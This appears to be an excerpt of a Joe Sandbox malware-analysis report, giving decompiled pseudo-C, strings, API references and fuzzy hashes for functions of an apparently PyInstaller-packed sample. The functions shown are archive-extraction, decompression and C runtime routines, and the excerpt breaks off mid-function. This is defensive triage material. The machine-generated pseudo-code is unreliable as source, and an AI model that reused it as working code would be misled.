
APIs

_fread_nolock.LIBCMT ref: 00007FF7DA8D185C
_fread_nolock.LIBCMT ref: 00007FF7DA8D190E

Part of subcall function 00007FF7DA8DF2C0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF2D4

Part of subcall function 00007FF7DA8D2770: MessageBoxW.USER32 ref: 00007FF7DA8D2841

Strings

malloc, xrefs: 00007FF7DA8D18EA
Failed to seek to cookie position!, xrefs: 00007FF7DA8D182F
fread, xrefs: 00007FF7DA8D186E
Could not allocate buffer for TOC!, xrefs: 00007FF7DA8D18E3
Error on file., xrefs: 00007FF7DA8D193D
Failed to read cookie!, xrefs: 00007FF7DA8D1867
Cannot read Table of Contents., xrefs: 00007FF7DA8D1995
Could not read full TOC!, xrefs: 00007FF7DA8D1919
fseek, xrefs: 00007FF7DA8D1836
MEI, xrefs: 00007FF7DA8D17EF

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _fread_nolock$Message_invalid_parameter_noinfo
String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 2153230061-4158440160
Opcode ID: 57c1acc45f6d3bf186888dc5166ee64feb4b11790a4847366ef95120017762c8
Instruction ID: 6aac1e66fc88cc3e3ba7810b3fd081368aa974dcec832ee59b3fd5f1791c9f16
Opcode Fuzzy Hash: 57c1acc45f6d3bf186888dc5166ee64feb4b11790a4847366ef95120017762c8
Instruction Fuzzy Hash: 48513D72A096028AFF56EF24D49017CA3A1FF88B58BD98576DD0D83396DF3CE5608750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D12B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E00007FF77FF7DA8D12B0(long long* __rcx, void* __rdx) {
				long long _t8;
				void* _t15;
				void* _t16;
				void* _t17;

				_t8 =  *((intOrPtr*)(__rcx));
				_t15 = __rdx;
				if (_t8 != 0) goto 0xda8d12f8;
				E00007FF77FF7DA8D3C90(_t8, __rcx + 0x78, "rb"); // executed
				 *__rcx = _t8;
				if (_t8 != 0) goto 0xda8d12f8;
				E00007FF77FF7DA8D2770(_t8, "Failed to extract %s: failed to open archive file!\n", _t15 + 0x12, _t16, _t17);
				return 0;
			}

0x7ff7da8d12b8
0x7ff7da8d12bb
0x7ff7da8d12c4
0x7ff7da8d12d1
0x7ff7da8d12d6
0x7ff7da8d12dc
0x7ff7da8d12e9
0x7ff7da8d12f7

Strings

malloc, xrefs: 00007FF7DA8D1353
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7DA8D1312
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7DA8D134C
fread, xrefs: 00007FF7DA8D13E9
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7DA8D12E2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7DA8D13E2
fseek, xrefs: 00007FF7DA8D1319

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 3f1c233fcb9d7e5dcfe898dc81ad5ca0fa2052c7f45812f0f4ecfac340e60cae
Instruction ID: 8a11dc1239a9cf9794e03606c88363f32ab4b053f65afcb60a148990fb80bc73
Opcode Fuzzy Hash: 3f1c233fcb9d7e5dcfe898dc81ad5ca0fa2052c7f45812f0f4ecfac340e60cae
Instruction Fuzzy Hash: 41417C21A0864385FE16FB11E4006AEE3A1FF54B94FC84473DE4D07A96EE7DE5628320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7DA8D3B80: GetModuleFileNameW.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D3BB1

SetDllDirectoryW.KERNEL32 ref: 00007FF7DA8D3885

Part of subcall function 00007FF7DA8D6970: GetEnvironmentVariableW.KERNEL32(00007FF7DA8D36C7), ref: 00007FF7DA8D69AA
Part of subcall function 00007FF7DA8D6970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7DA8D69C7

Strings

_MEIPASS2, xrefs: 00007FF7DA8D36B3, 00007FF7DA8D371C, 00007FF7DA8D39CB, 00007FF7DA8D39DB
Failed to convert DLL search path!, xrefs: 00007FF7DA8D386D
_PYI_ONEDIR_MODE, xrefs: 00007FF7DA8D36DC, 00007FF7DA8D3707
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF7DA8D376E
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF7DA8D380C
MEI, xrefs: 00007FF7DA8D37C7

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 6a02d8f440778dc44e3c7cf94fc8730b4e73b31e16a745f39ed32a7300d9e240
Instruction ID: baf991c8d9645cd1c75a6ac5a2bbcf806b88885f77043d97bb43af0c08f1b38c
Opcode Fuzzy Hash: 6a02d8f440778dc44e3c7cf94fc8730b4e73b31e16a745f39ed32a7300d9e240
Instruction Fuzzy Hash: CFB1A061A1DA8359FE66BB2198502FDD250FF80784FC840B3EE4D47697EF2CE5258720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00007FF77FF7DA8D1050(long long __rax, long long __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* _t13;
				void* _t28;
				void* _t31;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t41;
				void* _t44;

				_t40 = __r9;
				_t39 = __r8;
				_t18 = __rax;
				 *((long long*)(_t36 + 0x10)) = __rdx;
				 *((long long*)(_t36 + 8)) = __rcx;
				_push(_t34);
				_t37 = _t36 - 0x88;
				 *((long long*)(_t37 + 0x50)) = __rax;
				 *((long long*)(_t37 + 0x58)) = __rax;
				 *((long long*)(_t37 + 0x60)) = __rax;
				_t6 = _t18 + 0x58; // 0x58
				r8d = _t6;
				 *((intOrPtr*)(_t37 + 0x28)) = 0;
				 *((long long*)(_t37 + 0x20)) = __rax;
				_t13 = E00007FF77FF7DA8D98D0(__rdx, _t37 + 0x20, "1.2.13");
				r15d = _t13;
				if (_t13 == 0) goto 0xda8d10d3;
				r8d = _t13;
				E00007FF77FF7DA8D2770(_t18, "Failed to extract %s: inflateInit() failed with return code %d!\n", __rdx + 0x12, _t39, _t40, _t44, _t41, _t28, _t31);
				_t11 = _t34 - 1; // -1
				return _t11;
			}

Strings

malloc, xrefs: 00007FF7DA8D10F8, 00007FF7DA8D1126
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7DA8D10B4
1.2.13, xrefs: 00007FF7DA8D107E
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7DA8D1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7DA8D111F
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7DA8D10F1

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-1655038675
Opcode ID: ba29b0f56e8a5e3802d5d51107e080ed818d2ec468f31acb82f6facf743bb4d5
Instruction ID: b3684fd851c4ea9f5415e35edc2e6a9974a411be8bf9f4533696a5fb81c7b5ed
Opcode Fuzzy Hash: ba29b0f56e8a5e3802d5d51107e080ed818d2ec468f31acb82f6facf743bb4d5
Instruction Fuzzy Hash: B451AC22A0968289FE22FB51A4403BEE290BF84794FC84176DE4D876C6EF3CE5658310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EAE7C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00007FF77FF7DA8EAE7C(void* __ebx, signed int __ecx, intOrPtr* __rax, long long __rbx, long long __rdx, char _a8, long long _a16, long long _a24, intOrPtr _a32) {
				void* _v72;
				long long _v80;
				signed int _v88;
				long long _v96;
				void* _v104;
				unsigned long long _v120;
				void* __rdi;
				void* __rbp;
				char _t142;
				int _t151;
				void* _t152;
				void* _t156;
				void* _t162;
				char _t170;
				char _t171;
				signed int _t175;
				signed char _t178;
				void* _t198;
				void* _t199;
				void* _t200;
				unsigned int _t202;
				void* _t205;
				long long _t210;
				long long _t246;
				intOrPtr _t247;
				signed long long _t254;
				signed short* _t258;
				intOrPtr* _t260;
				char* _t263;
				signed long long _t278;
				void* _t280;
				unsigned long long _t285;
				void* _t286;
				signed long long _t291;
				signed long long _t292;
				unsigned long long _t293;
				signed short* _t295;
				signed short* _t301;
				signed short* _t302;
				unsigned long long _t306;
				signed long long _t308;
				char* _t310;
				char* _t311;
				char* _t312;
				signed long long _t313;

				_t273 = __rdx;
				_t162 = __ebx;
				_a24 = __rbx;
				_a16 = __rdx;
				r12d = r8d;
				if (r13d != 0xfffffffe) goto 0xda8eaebd;
				E00007FF77FF7DA8E4374(__rax);
				 *__rax = 0;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 9;
				goto 0xda8eb2ae;
				if (__ecx < 0) goto 0xda8eb297;
				_t205 = r13d -  *0xda91ce20; // 0x40
				if (_t205 >= 0) goto 0xda8eb297;
				_t3 = _t285 + 1; // 0x1
				_t178 = _t3;
				_v80 = __rdx;
				_t291 = __ecx >> 6;
				_v88 = _t291;
				_t308 = __ecx + __ecx * 8;
				_t246 =  *((intOrPtr*)(0xda91ca20 + _t291 * 8));
				if (( *(_t246 + 0x38 + _t308 * 8) & _t178) == 0) goto 0xda8eb297;
				if (r12d - 0x7fffffff <= 0) goto 0xda8eaf28;
				E00007FF77FF7DA8E4374(_t246);
				 *_t246 = 0;
				E00007FF77FF7DA8E4394(_t246);
				 *_t246 = 0x16;
				goto 0xda8eb2a9;
				if (r12d == 0) goto 0xda8eb293;
				if (( *(_t246 + 0x38 + _t308 * 8) & 0x00000002) != 0) goto 0xda8eb293;
				_t210 = __rdx;
				if (_t210 == 0) goto 0xda8eaf11;
				r10d =  *((char*)(_t246 + 0x39 + _t308 * 8));
				_v96 =  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8));
				_a8 = r10b;
				if (_t210 == 0) goto 0xda8eaf9a;
				if (r10d - _t178 != _t178) goto 0xda8eaf92;
				if ((_t178 &  !r12d) != 0) goto 0xda8eaf92;
				E00007FF77FF7DA8E4374(_t246);
				 *_t246 = 0;
				E00007FF77FF7DA8E4394(_t246);
				 *_t246 = 0x16;
				E00007FF77FF7DA8E9D00();
				goto 0xda8eb120;
				goto 0xda8eb018;
				if ((_t178 &  !r12d) == 0) goto 0xda8eaf76;
				_t198 =  <  ? 4 : r12d >> 1;
				E00007FF77FF7DA8ECA1C(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
				_t263 = _t246;
				E00007FF77FF7DA8E9D68(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
				E00007FF77FF7DA8E9D68(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
				_t310 = _t263;
				if (_t263 != 0) goto 0xda8eafe8;
				E00007FF77FF7DA8E4394(_t246);
				 *_t246 = 0xc;
				E00007FF77FF7DA8E4374(_t246);
				 *_t246 = 8;
				goto 0xda8eb120;
				_t32 = _t273 + 1; // 0x1
				r8d = _t32;
				E00007FF77FF7DA8EB6A4(_t246, _t263, _t280);
				_t292 = _v88;
				r10b = _a8;
				 *((long long*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x30 + _t308 * 8)) = _t246;
				_t247 =  *((intOrPtr*)(0xda91ca20 + _t292 * 8));
				_v72 = _t310;
				r9d = 0xa;
				if (( *(_t247 + 0x38 + _t308 * 8) & 0x00000048) == 0) goto 0xda8eb0aa;
				_t142 =  *((intOrPtr*)(_t247 + 0x3a + _t308 * 8));
				if (_t142 == r9b) goto 0xda8eb0aa;
				if (_t198 == 0) goto 0xda8eb0aa;
				 *_t310 = _t142;
				_t199 = _t198 - 1;
				_t311 = _t310 + __rdx;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3a + _t308 * 8)) = r9b;
				if (r10b == 0) goto 0xda8eb0aa;
				_t170 =  *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3b + _t308 * 8));
				if (_t170 == r9b) goto 0xda8eb0aa;
				if (_t199 == 0) goto 0xda8eb0aa;
				 *_t311 = _t170;
				_t312 = _t311 + __rdx;
				_t200 = _t199 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3b + _t308 * 8)) = r9b;
				if (r10b != 1) goto 0xda8eb0aa;
				_t171 =  *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3c + _t308 * 8));
				if (_t171 == r9b) goto 0xda8eb0aa;
				if (_t200 == 0) goto 0xda8eb0aa;
				 *_t312 = _t171;
				_t313 = _t312 + __rdx;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3c + _t308 * 8)) = r9b;
				if (E00007FF77FF7DA8F298C(r13d,  *((intOrPtr*)(0xda91ca20 + _t292 * 8))) == 0) goto 0xda8eb13e;
				_t254 =  *((intOrPtr*)(0xda91ca20 + _v88 * 8));
				if ( *((intOrPtr*)(_t254 + 0x38 + _t308 * 8)) - sil >= 0) goto 0xda8eb13e;
				if (GetConsoleMode(??, ??) == 0) goto 0xda8eb13e;
				if (_a8 != 2) goto 0xda8eb143;
				_t202 = _t200 - 1 >> 1;
				r8d = _t202;
				_v120 = _t285;
				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0xda8eb132;
				E00007FF77FF7DA8E4308(GetLastError(), _t254, _v96);
				E00007FF77FF7DA8E9D68(_t254, _t263);
				goto 0xda8eb2b1;
				goto 0xda8eb17e;
				_v80 = sil;
				r8d = _t202;
				_v120 = _t285;
				_t151 = ReadFile(??, ??, ??, ??, ??); // executed
				if (_t151 == 0) goto 0xda8eb25d;
				if (_a32 - r12d > 0) goto 0xda8eb25d;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _v88 * 8)) + 0x38 + _t308 * 8)) - sil >= 0) goto 0xda8eb123;
				_t293 = _t280 + _t254 * 2 + _a32;
				if (_a8 == 2) goto 0xda8eb1c7;
				_t278 = _t313;
				_v120 = _t306 >> 1;
				_t152 = E00007FF77FF7DA8EAA94(_t151, _t162, r13d, 0, _t263, _t278, _t286, _t293, _a16);
				goto 0xda8eb123;
				if (_v80 == sil) goto 0xda8eb24b;
				_t302 = _v72;
				_t258 = _t302;
				_t301 =  &(_t302[_t293 >> 1]);
				if (_t302 - _t301 >= 0) goto 0xda8eb23e;
				_t175 =  *_t258 & 0x0000ffff;
				if (_t175 == 0x1a) goto 0xda8eb22d;
				if (_t175 != 0xd) goto 0xda8eb213;
				_t295 =  &(_t258[1]);
				if (_t295 - _t301 >= 0) goto 0xda8eb213;
				if ( *_t295 != 0xa) goto 0xda8eb213;
				r11d = 4;
				goto 0xda8eb219;
				r11d = 2;
				 *_t302 = 0xa;
				if ( &(_t258[0x3ffbed48e510]) - _t301 < 0) goto 0xda8eb1ea;
				goto 0xda8eb23e;
				_t260 =  *((intOrPtr*)(0xda91ca20 + _t278 * 8));
				 *(_t260 + 0x38 + _t308 * 8) =  *(_t260 + 0x38 + _t308 * 8) | 0x00000002;
				goto 0xda8eb123;
				E00007FF77FF7DA8EA8D4(_t152, r13d, _t263, 0xda91ca20, _v72,  &(_t302[1]), 0xda91ca20);
				goto 0xda8eb1c0;
				if (GetLastError() != 5) goto 0xda8eb283;
				E00007FF77FF7DA8E4394(_t260);
				 *_t260 = 9;
				_t156 = E00007FF77FF7DA8E4374(_t260);
				 *_t260 = 5;
				goto 0xda8eb120;
				if (_t156 != 0x6d) goto 0xda8eb119;
				goto 0xda8eb123;
				goto 0xda8eb2b1;
				E00007FF77FF7DA8E4374(_t260);
				 *_t260 = 0xa;
				E00007FF77FF7DA8E4394(_t260);
				 *_t260 = 9;
				return E00007FF77FF7DA8E9D00() | 0xffffffff;
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EB2A9

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 599bb4360aea2a78f00c0266304e96a875c24cc16e3fd6bec0de54c53e0839d3
Instruction ID: 844910733d293e58ea6f1fdd2ae775f2585802e2b94ba741d24b2357a207e1a7
Opcode Fuzzy Hash: 599bb4360aea2a78f00c0266304e96a875c24cc16e3fd6bec0de54c53e0839d3
Instruction Fuzzy Hash: 65C1D522A1C687C1F612AB1194082BDFB91FFA1B90FD58172DE4D03793DE7EE6658320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EE82C Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00007FF77FF7DA8EE82C(signed int __edx, void* __edi, void* __rcx, void* __rdx, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56) {
				signed int _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				char _v128;
				char _v132;
				char _v136;
				intOrPtr _t49;
				void* _t53;
				void* _t65;
				intOrPtr _t67;
				signed long long _t86;
				intOrPtr _t88;
				signed long long _t110;
				intOrPtr _t112;
				void* _t117;
				intOrPtr* _t118;
				void* _t120;
				signed long long _t140;
				void* _t143;
				void* _t146;
				intOrPtr* _t152;

				_t110 =  *0xda90d008; // 0xe3add53f52b8
				_v80 = _t110 ^ _t146 - 0x00000078;
				_t67 = __rcx - 0x76c;
				_t86 = r8d;
				_t140 = __edx;
				if (_t67 - 0x46 < 0) goto 0xda8eea1e;
				_t112 = _t67;
				if (_t112 - 0x44d > 0) goto 0xda8eea1e;
				_t49 = __edx - 1;
				_v124 = _t49;
				if (_t49 - 0xb > 0) goto 0xda8eea1e;
				if (r8d <= 0) goto 0xda8eea1e;
				if (r8d -  *((intOrPtr*)(0xda9077a0 + __edx * 4)) -  *((intOrPtr*)(0xda9077a0 + __edx * 4 - 4)) <= 0) goto 0xda8ee8d0;
				if (E00007FF77FF7DA8EE7D0(_t67, r8d -  *((intOrPtr*)(0xda9077a0 + __edx * 4)) -  *((intOrPtr*)(0xda9077a0 + __edx * 4 - 4))) == 0) goto 0xda8eea1e;
				if (__edi != 2) goto 0xda8eea1e;
				if (_t86 - 0x1d > 0) goto 0xda8eea1e;
				if (r13d - 0x17 > 0) goto 0xda8eea1e;
				if (r12d - 0x3b > 0) goto 0xda8eea1e;
				if (r15d - 0x3b > 0) goto 0xda8eea1e;
				_t53 = E00007FF77FF7DA8EE7D0(_t67, r15d - 0x3b);
				r14d = 0;
				if (_t53 == 0) goto 0xda8ee907;
				if (__edi - 2 <= 0) goto 0xda8ee907;
				_t88 = _t86 +  *((intOrPtr*)(0xda9077a0 + _t140 * 4 - 4)) + 1; // executed
				E00007FF77FF7DA8F5304(_t112); // executed
				_v128 = r14d;
				_v132 = r14d;
				_v136 = r14d;
				if (E00007FF77FF7DA8F4708(_t112,  &_v128) != 0) goto 0xda8eea4a;
				if (E00007FF77FF7DA8F4738(_t112,  &_v132) != 0) goto 0xda8eea4a;
				if (E00007FF77FF7DA8F4768(_t112,  &_v136) != 0) goto 0xda8eea4a;
				r10d = 0x51eb851f;
				r8d = _t120 - 1;
				r9d = r10d * (_t120 + 0x12b) >> 0x20;
				r9d = r9d >> 7;
				r9d = r9d + (r9d >> 0x1f);
				r9d = r9d - (r10d * r8d >> 0x20 >> 5) + (r10d * r8d >> 0x20 >> 5 >> 0x1f);
				asm("cdq");
				_t143 = ((((__rdx + _t112 >> 2) + 0xffffffef + r9d + (_t67 + 0xffffffba) * 0x16d + _t88 + ((__rdx + _t112 >> 2) + 0xffffffef + r9d + (_t67 + 0xffffffba) * 0x16d + _t88) * 2) * 8 + r9d) * 0x3c + _a40) * 0x3c + _v136 + _a48;
				_t152 = _v132 + _t143;
				if (_a56 == 1) goto 0xda8eea19;
				_v104 = _v124;
				_v92 = _t88;
				_v100 = _t67;
				_v112 = r13d;
				_v116 = r12d;
				_v120 = r15d;
				if (_a56 != 0xffffffff) goto 0xda8eea14;
				if (_v128 == 0) goto 0xda8eea14;
				E00007FF77FF7DA8F5348( &_v120);
				_t144 =  !=  ? _t152 : _t143;
				_t117 =  !=  ? _t152 : _t143;
				goto 0xda8eea2d;
				_t118 = _t152;
				goto 0xda8eea2d;
				_t65 = E00007FF77FF7DA8E4394(_t118);
				 *_t118 = 0x16;
				return E00007FF77FF7DA8DACF0(_t65, (__rdx + _t112 >> 2) + 0xffffffef + r9d, _v80 ^ _t146 - 0x00000078);
			}

APIs

_get_daylight.LIBCMT ref: 00007FF7DA8EE91C
_get_daylight.LIBCMT ref: 00007FF7DA8EE92D
_get_daylight.LIBCMT ref: 00007FF7DA8EE93E
_isindst.LIBCMT ref: 00007FF7DA8EEA09

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: f648b83e3cb410d1bce6a6d96ba3f226e96b8c179cb4383b6c0ac88b0926170b
Instruction ID: 9e96a7435e243e58a16f07255a720f9695ff9232f27c24a0a17768a34c552146
Opcode Fuzzy Hash: f648b83e3cb410d1bce6a6d96ba3f226e96b8c179cb4383b6c0ac88b0926170b
Instruction Fuzzy Hash: 53513872F042129AFB15EF64D9416BCA7A1BB30358FD0413ADD1D52AD6DF3DA621C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E4724 Relevance: 6.1, APIs: 4, Instructions: 119
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00007FF77FF7DA8E4724(intOrPtr __edx, long long __rbx, void* __rcx, void* __r8, intOrPtr* __r9, long long _a16) {
				signed int _v56;
				intOrPtr _v64;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v120;
				signed long long _v128;
				long long _v136;
				void* __rsi;
				void* __rbp;
				long _t37;
				intOrPtr _t40;
				int _t42;
				signed int _t47;
				intOrPtr _t60;
				long _t61;
				signed long long _t78;
				signed long long _t79;
				intOrPtr _t89;
				void* _t102;

				_a16 = __rbx;
				_t78 =  *0xda90d008; // 0xe3add53f52b8
				_t79 = _t78 ^ _t102 - 0x00000080;
				_v56 = _t79;
				r14d = __edx; // executed
				_t37 = GetFileType(??); // executed
				r15d = 1;
				asm("btr ecx, 0xf");
				if (_t37 != r15d) goto 0xda8e482f;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				if (__rcx == 0) goto 0xda8e479e;
				_v120 = _v120 & 0x00000000;
				if (E00007FF77FF7DA8E4B44(__rcx,  &_v120, __r8) == 0) goto 0xda8e4846;
				_t40 = _v120 - 1;
				 *((intOrPtr*)(__r9 + 0x10)) = _t40;
				 *__r9 = _t40;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x48], xmm0");
				_v64 = 0;
				asm("movups [ebp-0x38], xmm0");
				asm("movups [ebp-0x28], xmm0"); // executed
				_t42 = GetFileInformationByHandle(??, ??); // executed
				if (_t42 == 0) goto 0xda8e484a;
				_t60 = _v112;
				_t96 = __rcx;
